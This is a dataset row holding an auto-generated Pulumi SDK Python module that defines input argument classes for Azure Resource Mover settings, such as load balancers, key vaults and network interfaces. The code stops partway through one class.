hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
12c910019ee898a49353296cfa1151794de23e8c | 76,959 | py | Python | sdk/python/pulumi_azure_native/migrate/v20210101/_inputs.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/migrate/v20210101/_inputs.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/migrate/v20210101/_inputs.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ._enums import *
__all__ = [
'AvailabilitySetResourceSettingsArgs',
'DiskEncryptionSetResourceSettingsArgs',
'IdentityArgs',
'KeyVaultResourceSettingsArgs',
'LBBackendAddressPoolResourceSettingsArgs',
'LBFrontendIPConfigurationResourceSettingsArgs',
'LoadBalancerBackendAddressPoolReferenceArgs',
'LoadBalancerNatRuleReferenceArgs',
'LoadBalancerResourceSettingsArgs',
'MoveCollectionPropertiesArgs',
'MoveResourceDependencyOverrideArgs',
'MoveResourcePropertiesArgs',
'NetworkInterfaceResourceSettingsArgs',
'NetworkSecurityGroupResourceSettingsArgs',
'NicIpConfigurationResourceSettingsArgs',
'NsgReferenceArgs',
'NsgSecurityRuleArgs',
'PublicIPAddressResourceSettingsArgs',
'PublicIpReferenceArgs',
'ResourceGroupResourceSettingsArgs',
'SqlDatabaseResourceSettingsArgs',
'SqlElasticPoolResourceSettingsArgs',
'SqlServerResourceSettingsArgs',
'SubnetReferenceArgs',
'SubnetResourceSettingsArgs',
'VirtualMachineResourceSettingsArgs',
'VirtualNetworkResourceSettingsArgs',
]
@pulumi.input_type
class AvailabilitySetResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str],
fault_domain: Optional[pulumi.Input[int]] = None,
update_domain: Optional[pulumi.Input[int]] = None):
"""
Gets or sets the availability set resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Compute/availabilitySets'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
:param pulumi.Input[int] fault_domain: Gets or sets the target fault domain.
:param pulumi.Input[int] update_domain: Gets or sets the target update domain.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Compute/availabilitySets')
pulumi.set(__self__, "target_resource_name", target_resource_name)
if fault_domain is not None:
pulumi.set(__self__, "fault_domain", fault_domain)
if update_domain is not None:
pulumi.set(__self__, "update_domain", update_domain)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Compute/availabilitySets'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@property
@pulumi.getter(name="faultDomain")
def fault_domain(self) -> Optional[pulumi.Input[int]]:
"""
Gets or sets the target fault domain.
"""
return pulumi.get(self, "fault_domain")
@fault_domain.setter
def fault_domain(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "fault_domain", value)
@property
@pulumi.getter(name="updateDomain")
def update_domain(self) -> Optional[pulumi.Input[int]]:
"""
Gets or sets the target update domain.
"""
return pulumi.get(self, "update_domain")
@update_domain.setter
def update_domain(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "update_domain", value)
@pulumi.input_type
class DiskEncryptionSetResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str]):
"""
Defines the disk encryption set resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Compute/diskEncryptionSets'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Compute/diskEncryptionSets')
pulumi.set(__self__, "target_resource_name", target_resource_name)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Compute/diskEncryptionSets'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@pulumi.input_type
class IdentityArgs:
def __init__(__self__, *,
principal_id: Optional[pulumi.Input[str]] = None,
tenant_id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[Union[str, 'ResourceIdentityType']]] = None):
"""
Defines the MSI properties of the Move Collection.
:param pulumi.Input[str] principal_id: Gets or sets the principal id.
:param pulumi.Input[str] tenant_id: Gets or sets the tenant id.
:param pulumi.Input[Union[str, 'ResourceIdentityType']] type: The type of identity used for the resource mover service.
"""
if principal_id is not None:
pulumi.set(__self__, "principal_id", principal_id)
if tenant_id is not None:
pulumi.set(__self__, "tenant_id", tenant_id)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="principalId")
def principal_id(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the principal id.
"""
return pulumi.get(self, "principal_id")
@principal_id.setter
def principal_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "principal_id", value)
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the tenant id.
"""
return pulumi.get(self, "tenant_id")
@tenant_id.setter
def tenant_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tenant_id", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[Union[str, 'ResourceIdentityType']]]:
"""
The type of identity used for the resource mover service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[Union[str, 'ResourceIdentityType']]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class KeyVaultResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str]):
"""
Defines the key vault resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.KeyVault/vaults'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.KeyVault/vaults')
pulumi.set(__self__, "target_resource_name", target_resource_name)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.KeyVault/vaults'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@pulumi.input_type
class LBBackendAddressPoolResourceSettingsArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None):
"""
Defines load balancer backend address pool properties.
:param pulumi.Input[str] name: Gets or sets the backend address pool name.
"""
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the backend address pool name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class LBFrontendIPConfigurationResourceSettingsArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
private_ip_address: Optional[pulumi.Input[str]] = None,
private_ip_allocation_method: Optional[pulumi.Input[str]] = None,
subnet: Optional[pulumi.Input['SubnetReferenceArgs']] = None,
zones: Optional[pulumi.Input[str]] = None):
"""
Defines load balancer frontend IP configuration properties.
:param pulumi.Input[str] name: Gets or sets the frontend IP configuration name.
:param pulumi.Input[str] private_ip_address: Gets or sets the IP address of the Load Balancer.This is only specified if a specific
private IP address shall be allocated from the subnet specified in subnetRef.
:param pulumi.Input[str] private_ip_allocation_method: Gets or sets PrivateIP allocation method (Static/Dynamic).
:param pulumi.Input['SubnetReferenceArgs'] subnet: Defines reference to subnet.
:param pulumi.Input[str] zones: Gets or sets the csv list of zones.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if private_ip_address is not None:
pulumi.set(__self__, "private_ip_address", private_ip_address)
if private_ip_allocation_method is not None:
pulumi.set(__self__, "private_ip_allocation_method", private_ip_allocation_method)
if subnet is not None:
pulumi.set(__self__, "subnet", subnet)
if zones is not None:
pulumi.set(__self__, "zones", zones)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the frontend IP configuration name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="privateIpAddress")
def private_ip_address(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the IP address of the Load Balancer.This is only specified if a specific
private IP address shall be allocated from the subnet specified in subnetRef.
"""
return pulumi.get(self, "private_ip_address")
@private_ip_address.setter
def private_ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ip_address", value)
@property
@pulumi.getter(name="privateIpAllocationMethod")
def private_ip_allocation_method(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets PrivateIP allocation method (Static/Dynamic).
"""
return pulumi.get(self, "private_ip_allocation_method")
@private_ip_allocation_method.setter
def private_ip_allocation_method(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ip_allocation_method", value)
@property
@pulumi.getter
def subnet(self) -> Optional[pulumi.Input['SubnetReferenceArgs']]:
"""
Defines reference to subnet.
"""
return pulumi.get(self, "subnet")
@subnet.setter
def subnet(self, value: Optional[pulumi.Input['SubnetReferenceArgs']]):
pulumi.set(self, "subnet", value)
@property
@pulumi.getter
def zones(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the csv list of zones.
"""
return pulumi.get(self, "zones")
@zones.setter
def zones(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zones", value)
@pulumi.input_type
class LoadBalancerBackendAddressPoolReferenceArgs:
def __init__(__self__, *,
source_arm_resource_id: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None):
"""
Defines reference to load balancer backend address pools.
:param pulumi.Input[str] source_arm_resource_id: Gets the ARM resource ID of the tracked resource being referenced.
:param pulumi.Input[str] name: Gets the name of the proxy resource on the target side.
"""
pulumi.set(__self__, "source_arm_resource_id", source_arm_resource_id)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="sourceArmResourceId")
def source_arm_resource_id(self) -> pulumi.Input[str]:
"""
Gets the ARM resource ID of the tracked resource being referenced.
"""
return pulumi.get(self, "source_arm_resource_id")
@source_arm_resource_id.setter
def source_arm_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "source_arm_resource_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Gets the name of the proxy resource on the target side.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class LoadBalancerNatRuleReferenceArgs:
def __init__(__self__, *,
source_arm_resource_id: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None):
"""
Defines reference to load balancer NAT rules.
:param pulumi.Input[str] source_arm_resource_id: Gets the ARM resource ID of the tracked resource being referenced.
:param pulumi.Input[str] name: Gets the name of the proxy resource on the target side.
"""
pulumi.set(__self__, "source_arm_resource_id", source_arm_resource_id)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="sourceArmResourceId")
def source_arm_resource_id(self) -> pulumi.Input[str]:
"""
Gets the ARM resource ID of the tracked resource being referenced.
"""
return pulumi.get(self, "source_arm_resource_id")
@source_arm_resource_id.setter
def source_arm_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "source_arm_resource_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Gets the name of the proxy resource on the target side.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class LoadBalancerResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str],
backend_address_pools: Optional[pulumi.Input[Sequence[pulumi.Input['LBBackendAddressPoolResourceSettingsArgs']]]] = None,
frontend_ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input['LBFrontendIPConfigurationResourceSettingsArgs']]]] = None,
sku: Optional[pulumi.Input[str]] = None,
zones: Optional[pulumi.Input[str]] = None):
"""
Defines the load balancer resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Network/loadBalancers'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
:param pulumi.Input[Sequence[pulumi.Input['LBBackendAddressPoolResourceSettingsArgs']]] backend_address_pools: Gets or sets the backend address pools of the load balancer.
:param pulumi.Input[Sequence[pulumi.Input['LBFrontendIPConfigurationResourceSettingsArgs']]] frontend_ip_configurations: Gets or sets the frontend IP configurations of the load balancer.
:param pulumi.Input[str] sku: Gets or sets load balancer sku (Basic/Standard).
:param pulumi.Input[str] zones: Gets or sets the csv list of zones common for all frontend IP configurations. Note this is given
precedence only if frontend IP configurations settings are not present.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Network/loadBalancers')
pulumi.set(__self__, "target_resource_name", target_resource_name)
if backend_address_pools is not None:
pulumi.set(__self__, "backend_address_pools", backend_address_pools)
if frontend_ip_configurations is not None:
pulumi.set(__self__, "frontend_ip_configurations", frontend_ip_configurations)
if sku is not None:
pulumi.set(__self__, "sku", sku)
if zones is not None:
pulumi.set(__self__, "zones", zones)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Network/loadBalancers'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@property
@pulumi.getter(name="backendAddressPools")
def backend_address_pools(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LBBackendAddressPoolResourceSettingsArgs']]]]:
"""
Gets or sets the backend address pools of the load balancer.
"""
return pulumi.get(self, "backend_address_pools")
@backend_address_pools.setter
def backend_address_pools(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['LBBackendAddressPoolResourceSettingsArgs']]]]):
pulumi.set(self, "backend_address_pools", value)
@property
@pulumi.getter(name="frontendIPConfigurations")
def frontend_ip_configurations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LBFrontendIPConfigurationResourceSettingsArgs']]]]:
"""
Gets or sets the frontend IP configurations of the load balancer.
"""
return pulumi.get(self, "frontend_ip_configurations")
@frontend_ip_configurations.setter
def frontend_ip_configurations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['LBFrontendIPConfigurationResourceSettingsArgs']]]]):
pulumi.set(self, "frontend_ip_configurations", value)
@property
@pulumi.getter
def sku(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets load balancer sku (Basic/Standard).
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sku", value)
@property
@pulumi.getter
def zones(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the csv list of zones common for all frontend IP configurations. Note this is given
precedence only if frontend IP configurations settings are not present.
"""
return pulumi.get(self, "zones")
@zones.setter
def zones(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zones", value)
@pulumi.input_type
class MoveCollectionPropertiesArgs:
def __init__(__self__, *,
source_region: pulumi.Input[str],
target_region: pulumi.Input[str]):
"""
Defines the move collection properties.
:param pulumi.Input[str] source_region: Gets or sets the source region.
:param pulumi.Input[str] target_region: Gets or sets the target region.
"""
pulumi.set(__self__, "source_region", source_region)
pulumi.set(__self__, "target_region", target_region)
@property
@pulumi.getter(name="sourceRegion")
def source_region(self) -> pulumi.Input[str]:
"""
Gets or sets the source region.
"""
return pulumi.get(self, "source_region")
@source_region.setter
def source_region(self, value: pulumi.Input[str]):
pulumi.set(self, "source_region", value)
@property
@pulumi.getter(name="targetRegion")
def target_region(self) -> pulumi.Input[str]:
"""
Gets or sets the target region.
"""
return pulumi.get(self, "target_region")
@target_region.setter
def target_region(self, value: pulumi.Input[str]):
pulumi.set(self, "target_region", value)
@pulumi.input_type
class MoveResourceDependencyOverrideArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
target_id: Optional[pulumi.Input[str]] = None):
"""
Defines the dependency override of the move resource.
:param pulumi.Input[str] id: Gets or sets the ARM ID of the dependent resource.
:param pulumi.Input[str] target_id: Gets or sets the resource ARM id of either the MoveResource or the resource ARM ID of
the dependent resource.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if target_id is not None:
pulumi.set(__self__, "target_id", target_id)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the ARM ID of the dependent resource.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter(name="targetId")
def target_id(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the resource ARM id of either the MoveResource or the resource ARM ID of
the dependent resource.
"""
return pulumi.get(self, "target_id")
@target_id.setter
def target_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_id", value)
@pulumi.input_type
class MoveResourcePropertiesArgs:
def __init__(__self__, *,
source_id: pulumi.Input[str],
depends_on_overrides: Optional[pulumi.Input[Sequence[pulumi.Input['MoveResourceDependencyOverrideArgs']]]] = None,
existing_target_id: Optional[pulumi.Input[str]] = None,
resource_settings: Optional[pulumi.Input[Union['AvailabilitySetResourceSettingsArgs', 'DiskEncryptionSetResourceSettingsArgs', 'KeyVaultResourceSettingsArgs', 'LoadBalancerResourceSettingsArgs', 'NetworkInterfaceResourceSettingsArgs', 'NetworkSecurityGroupResourceSettingsArgs', 'PublicIPAddressResourceSettingsArgs', 'ResourceGroupResourceSettingsArgs', 'SqlDatabaseResourceSettingsArgs', 'SqlElasticPoolResourceSettingsArgs', 'SqlServerResourceSettingsArgs', 'VirtualMachineResourceSettingsArgs', 'VirtualNetworkResourceSettingsArgs']]] = None):
"""
Defines the move resource properties.
:param pulumi.Input[str] source_id: Gets or sets the Source ARM Id of the resource.
:param pulumi.Input[Sequence[pulumi.Input['MoveResourceDependencyOverrideArgs']]] depends_on_overrides: Gets or sets the move resource dependencies overrides.
:param pulumi.Input[str] existing_target_id: Gets or sets the existing target ARM Id of the resource.
:param pulumi.Input[Union['AvailabilitySetResourceSettingsArgs', 'DiskEncryptionSetResourceSettingsArgs', 'KeyVaultResourceSettingsArgs', 'LoadBalancerResourceSettingsArgs', 'NetworkInterfaceResourceSettingsArgs', 'NetworkSecurityGroupResourceSettingsArgs', 'PublicIPAddressResourceSettingsArgs', 'ResourceGroupResourceSettingsArgs', 'SqlDatabaseResourceSettingsArgs', 'SqlElasticPoolResourceSettingsArgs', 'SqlServerResourceSettingsArgs', 'VirtualMachineResourceSettingsArgs', 'VirtualNetworkResourceSettingsArgs']] resource_settings: Gets or sets the resource settings.
"""
pulumi.set(__self__, "source_id", source_id)
if depends_on_overrides is not None:
pulumi.set(__self__, "depends_on_overrides", depends_on_overrides)
if existing_target_id is not None:
pulumi.set(__self__, "existing_target_id", existing_target_id)
if resource_settings is not None:
pulumi.set(__self__, "resource_settings", resource_settings)
@property
@pulumi.getter(name="sourceId")
def source_id(self) -> pulumi.Input[str]:
"""
Gets or sets the Source ARM Id of the resource.
"""
return pulumi.get(self, "source_id")
@source_id.setter
def source_id(self, value: pulumi.Input[str]):
pulumi.set(self, "source_id", value)
@property
@pulumi.getter(name="dependsOnOverrides")
def depends_on_overrides(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MoveResourceDependencyOverrideArgs']]]]:
"""
Gets or sets the move resource dependencies overrides.
"""
return pulumi.get(self, "depends_on_overrides")
@depends_on_overrides.setter
def depends_on_overrides(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MoveResourceDependencyOverrideArgs']]]]):
pulumi.set(self, "depends_on_overrides", value)
@property
@pulumi.getter(name="existingTargetId")
def existing_target_id(self) -> Optional[pulumi.Input[str]]:
"""
Gets or sets the existing target ARM Id of the resource.
"""
return pulumi.get(self, "existing_target_id")
@existing_target_id.setter
def existing_target_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "existing_target_id", value)
@property
@pulumi.getter(name="resourceSettings")
def resource_settings(self) -> Optional[pulumi.Input[Union['AvailabilitySetResourceSettingsArgs', 'DiskEncryptionSetResourceSettingsArgs', 'KeyVaultResourceSettingsArgs', 'LoadBalancerResourceSettingsArgs', 'NetworkInterfaceResourceSettingsArgs', 'NetworkSecurityGroupResourceSettingsArgs', 'PublicIPAddressResourceSettingsArgs', 'ResourceGroupResourceSettingsArgs', 'SqlDatabaseResourceSettingsArgs', 'SqlElasticPoolResourceSettingsArgs', 'SqlServerResourceSettingsArgs', 'VirtualMachineResourceSettingsArgs', 'VirtualNetworkResourceSettingsArgs']]]:
"""
Gets or sets the resource settings.
"""
return pulumi.get(self, "resource_settings")
@resource_settings.setter
def resource_settings(self, value: Optional[pulumi.Input[Union['AvailabilitySetResourceSettingsArgs', 'DiskEncryptionSetResourceSettingsArgs', 'KeyVaultResourceSettingsArgs', 'LoadBalancerResourceSettingsArgs', 'NetworkInterfaceResourceSettingsArgs', 'NetworkSecurityGroupResourceSettingsArgs', 'PublicIPAddressResourceSettingsArgs', 'ResourceGroupResourceSettingsArgs', 'SqlDatabaseResourceSettingsArgs', 'SqlElasticPoolResourceSettingsArgs', 'SqlServerResourceSettingsArgs', 'VirtualMachineResourceSettingsArgs', 'VirtualNetworkResourceSettingsArgs']]]):
pulumi.set(self, "resource_settings", value)
@pulumi.input_type
class NetworkInterfaceResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str],
enable_accelerated_networking: Optional[pulumi.Input[bool]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input['NicIpConfigurationResourceSettingsArgs']]]] = None):
"""
Defines the network interface resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Network/networkInterfaces'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
:param pulumi.Input[bool] enable_accelerated_networking: Gets or sets a value indicating whether accelerated networking is enabled.
:param pulumi.Input[Sequence[pulumi.Input['NicIpConfigurationResourceSettingsArgs']]] ip_configurations: Gets or sets the IP configurations of the NIC.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Network/networkInterfaces')
pulumi.set(__self__, "target_resource_name", target_resource_name)
if enable_accelerated_networking is not None:
pulumi.set(__self__, "enable_accelerated_networking", enable_accelerated_networking)
if ip_configurations is not None:
pulumi.set(__self__, "ip_configurations", ip_configurations)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Network/networkInterfaces'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
